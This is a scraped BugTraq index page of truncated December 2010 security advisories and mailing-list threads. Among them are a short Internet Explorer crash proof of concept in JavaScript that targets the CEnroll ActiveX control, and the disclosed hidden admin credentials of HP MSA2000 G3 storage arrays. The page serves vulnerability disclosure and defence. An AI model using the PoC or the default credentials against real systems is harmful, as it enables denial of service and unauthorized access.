BugTraq
VUPEN Security Research - Microsoft Office Publisher Memory Corruption Vulnerability (VUPEN-SR-2010-041) 2010-12-16
VUPEN Security Research (advisories vupen com)
VUPEN Security Research - Microsoft Office Publisher Memory Corruption
Vulnerability (VUPEN-SR-2010-041)

http://www.vupen.com/english/research.php

I. BACKGROUND
---------------------

"Microsoft Publisher, is a desktop publishing application from Microsoft. It is
an entry-level application, dif

[security bulletin] HPSBST02620 SSRT100356 rev.1 - HP StorageWorks Modular Smart Array P2000 G3, Remote Unauthorized Access 2010-12-16
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02660754
Version: 1

HPSBST02620 SSRT100356 rev.1 - HP StorageWorks Modular Smart Array P2000 G3, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon

Openwall GNU/*/Linux 3.0 is out, marks 10 years of the project 2010-12-15
Solar Designer (solar openwall com)
Hi,

I am pleased to announce that we have made a new major release of
Openwall GNU/*/Linux, version 3.0. ISO images of the CDs for i686
and x86-64 are available for download via direct links from:

http://www.openwall.com/Owl/

The ISOs include a live system, installable packages, the installer
pr

Re: OpenBSD Paradox 2010-12-15
Theo de Raadt (deraadt cvs openbsd org)
> We has OpenBSD tell us:
>
> "We have never allowed US citizens or foreign citizens working in the
> US to hack on crypto code"
> http://marc.info/?l=openbsd-tech&m=129237675106730&w=2

That statement remains true.

IPSEC isn't 100% crypto; it is a complex layered subsystem with many
other e

[security bulletin] HPSBMA02616 SSRT100231 rev.1 - HP Insight Management Agents Running on Linux and Windows, Remote Full Path Disclosure 2010-12-15
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02653973
Version: 1

HPSBMA02616 SSRT100231 rev.1 - HP Insight Management Agents Running on Linux and Windows, Remote Full Path Disclosure

NOTICE: The information in this Security Bulletin should

OpenBSD Paradox 2010-12-15
musnt live (musntlive gmail com)
Use your brain! Is we think with our brain and ask: "how is
team OpenBSD lying to is public" well then is the proof is in the
kasha!

We has OpenBSD tell us:

"We have never allowed US citizens or foreign citizens working in the
US to hack on crypto code"
http://marc.info/?l=openbsd-tech&m=1

Re: OpenBSD's IPSEC is Backdoored 2010-12-15
Michael Scheidell (michael scheidell secnap com)
On 12/14/10 8:35 PM, musnt live wrote:
> Original e-mail is from Theo DeRaadt
>
> http://marc.info/?l=openbsd-tech&m=129236621626462&w=2
>

Then also read Jason Wright's response and clear denial:
http://marc.info/?l=openbsd-tech&m=129244045916861&w=2

--
Michael Scheidell, CTO
o: 561-999-5000
d: 5

[security bulletin] HPSBMA02615 SSRT100228 rev.1 - HP Insight Diagnostics Online Edition Running on Linux and Windows, Remote Cross Site Scripting (XSS) 2010-12-15
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02652463
Version: 1

HPSBMA02615 SSRT100228 rev.1 - HP Insight Diagnostics Online Edition Running on Linux and Windows, Remote Cross Site Scripting (XSS)

NOTICE: The information in this Security

[ MDVSA-2010:255 ] php-intl 2010-12-15
security mandriva com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:255
http://www.mandriva.com/security/
______________________________________________________________________

[ MDVSA-2010:254 ] php 2010-12-15
security mandriva com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:254
http://www.mandriva.com/security/
______________________________________________________________________

www.eVuln.com : BBCode CSS XSS in slickMsg 2010-12-15
bt evuln com
www.eVuln.com advisory:
BBCode CSS XSS in slickMsg
Summary: http://evuln.com/vulns/162/summary.html
Details: http://evuln.com/vulns/162/description.html

-----------Summary-----------
eVuln ID: EV0162
Software: slickMsg
Vendor: n/a
Version: 0.7-alpha
Critical Level: low
Type: Cross Site Scripting

www.eVuln.com : "post" - Non-persistent XSS in slickMsg 2010-12-15
bt evuln com
www.eVuln.com advisory:
"post" - Non-persistent XSS in slickMsg
Summary: http://evuln.com/vulns/161/summary.html
Details: http://evuln.com/vulns/161/description.html

-----------Summary-----------
eVuln ID: EV0161
Software: slickMsg
Vendor: n/a
Version: 0.7-alpha
Critical Level: low
Type: Cross Si

OpenBSD's IPSEC is Backdoored 2010-12-15
musnt live (musntlive gmail com)
Original e-mail is from Theo DeRaadt

http://marc.info/?l=openbsd-tech&m=129236621626462&w=2

I have received a mail regarding the early development of the OpenBSD
IPSEC stack. It is alleged that some ex-developers (and the company
they worked for) accepted US government money to put backdoors into

[USN-1024-2] OpenJDK regression 2010-12-15
Kees Cook (kees ubuntu com)
===========================================================
Ubuntu Security Notice USN-1024-2 December 13, 2010
openjdk-6 regression
https://launchpad.net/bugs/688522
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu

iDefense Security Advisory 12.14.10: Microsoft Internet Explorer HTML Object Memory Corruption Vulnerability 2010-12-14
labs-no-reply (labs-no-reply ivcp vrsn com)
iDefense Security Advisory 12.14.10
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 14, 2010

I. BACKGROUND

Internet Explorer is a graphical web browser developed by Microsoft
Corp. that has been included with Microsoft Windows since 1995. For
more information about Internet Explorer, pl

Re: [Full-disclosure] minor browser UI nitpicking 2010-12-14
Michal Zalewski (lcamtuf coredump cx)
> 1) Yup, pretty unconvincing. Though one could separate window shadows,

I'm guessing you have your window manager configured to render window
shadows. In this case, this is less plausible, yup, unless you do the
inverted gradient trick.

> 2) Where is "here"? :)

I tried to dig something up, but c

[security bulletin] HPSBOV02618 SSRT100354 rev.1 - HP OpenVMS Integrity Servers, Local Denial of Service (DoS), Gain Privileged Access 2010-12-15
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02656471
Version: 1

HPSBOV02618 SSRT100354 rev.1 - HP OpenVMS Integrity Servers, Local Denial of Service (DoS), Gain Privileged Access

NOTICE: The information in this Security Bulletin should be

Kryptos Logic Advisory: IBM Tivoli Storage Manager (TSM) Local Root 2010-12-15
Kryptos Logic Secure (secure kryptoslogic com)
http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmtca.txt
http://www.kryptoslogic.com/advisories/2010/kryptoslogic-ibm-tivoli-dsmtca-exploit.c

==-===-=====-=======-===========-=============-=================

IBM Tivoli Storage Manager (TSM) Local Root

Re: hidden admin user on every HP MSA2000 G3 2010-12-15
Pavel Kankovsky (peak argo troja mff cuni cz)
On Mon, 13 Dec 2010 hpdisclosure (at) anonmail (dot) de wrote:

> i just found out that there is a hidden user on every HP MSA2000 G3
> SAN out there:
>
> username: admin
> password: !admin

Confirmed on P2000 G3 (fw L100R013). (Please, HP, is it really
necessary to give us *so many* different reasons to hat

Microsoft Internet Explorer Denial of Service Vulnerability 2010-12-14
info securitylab ir
PoC:

<script language=javascript>
try
{
var tar = new ActiveXObject('CEnroll.CEnroll.2');
var a="sl";
tar.setPendingRequestInfo(0x05050505,a,a,a);
}
catch(sl){}
</script>

Tested on IE 6/7

Discovered by: Securitylab.ir (Kamran_st (at) yahoo (dot) com)

Homepage: http://Securitylab.ir

ASPR #2010-12-14-1: Remote Binary Planting in Windows Address Book 2010-12-14
ACROS Security Lists (lists acros si)
=====[BEGIN-ACROS-REPORT]=====

PUBLIC

=========================================================================
ACROS Security Problem Report #2010-12-14-1
-------------------------------------------------------------------------
ASPR #2010-12-14-1: Remote Binary Planting in Windows Address Book
=

minor browser UI nitpicking 2010-12-14
Michal Zalewski (lcamtuf coredump cx)
Hi folks,

Two minor things that do not deserve a lengthy discussion, but are
probably mildly interesting and worth mentioning for the record:

1) Chrome browser is an interesting example of the perils of using
minimalistic window chrome, allowing multiple windows to be spliced
seamlessly to confuse

iDefense Security Advisory 12.14.10: Microsoft Internet Explorer CSS Style Table Layout Uninitialized Memory Vulnerability 2010-12-14
labs-no-reply (labs-no-reply ivcp vrsn com)
iDefense Security Advisory 12.14.10
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 14, 2010

I. BACKGROUND

Internet Explorer is a graphical web browser developed by Microsoft
Corp. that has been included with Microsoft Windows since 1995. For
more information about Internet Explorer, pl

OSSTMM 3 Now Available! 2010-12-14
Pete Herzog (lists isecom org)
Hi,

The OSSTMM has been released today at www.osstmm.org.

It's a big document so you may want to check out some of the
reviews and commentary on it first. InfoSec Island is having an OSSTMM
week to spread the word:

https://www.infosecisland.com/osstmm.html

Some of the articles available:

www.eVuln.com : "post" - Non-persistent XSS in slickMsg 2010-12-14
www.eVuln.com Advisories (bt evuln com)
www.eVuln.com advisory:
"post" - Non-persistent XSS in slickMsg
Summary: http://evuln.com/vulns/161/summary.html
Details: http://evuln.com/vulns/161/description.html

-----------Summary-----------
eVuln ID: EV0161
Software: slickMsg
Vendor: n/a
Version: 0.7-alpha
Critical Level: low
Type: Cross Si

Re: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) 2010-12-13
Marsh Ray (marsh extendedsubset com)
On 12/13/2010 11:19 AM, Michael Bauer wrote:
> An administrator is very different there are many levels of
> administrative control in windows to say an admin is an admin is
> absurd.

I disagree. There's only one level of pwned.

> There is a big difference between a local admin and a domain
> admi

Re: [Full-disclosure] Linux kernel exploit 2010-12-13
Ryan Sears (rdsears mtu edu)
Hey Dan,

Freaking THANK YOU first and foremost. I've been waiting for someone to say that for days now, and was just about to myself.

Just because everyone and their brother wants to show off that they can compile & run some software (herp a derp, good job) DOESN'T mean they should immediately p

RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) 2010-12-13
Thor (Hammer of God) (thor hammerofgod com)
>The attack has some academically interesting details about how cached
>credentials work, but I agree with Stefan. If you own the machine, you own
>the machine. What's to stop you from, say, simply installing a rootkit?

Exactly. More importantly, even if you must make users local admins, there is

Re: RE: [Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002) 2010-12-13
StenoPlasma @ www.ExploitDevelopment.com (exploitdevelopmentdotcom gmail com)
Everyone.

Please read my original post.  I never claimed to gain access to
networked resources using the masqueraded account.  My method merely
shows that you can modify the SAM and SECURITY hives without using DLL
injection or any other advanced technique that security Admins are
currently looking

Re: hidden admin user on every HP MSA2000 G3 2010-12-13
nightfighter anonmail de
Can anyone confirm this vulnerability?
I don't have an MSA for testing at the moment.

> Hi,
>
> i just found out that there is a hidden user on every HP MSA2000 G3
> SAN out there:
>
> username: admin
> password: !admin
>
> this user doesn't show up in the user manager, and the password
> cannot be

Copyright 2010, SecurityFocus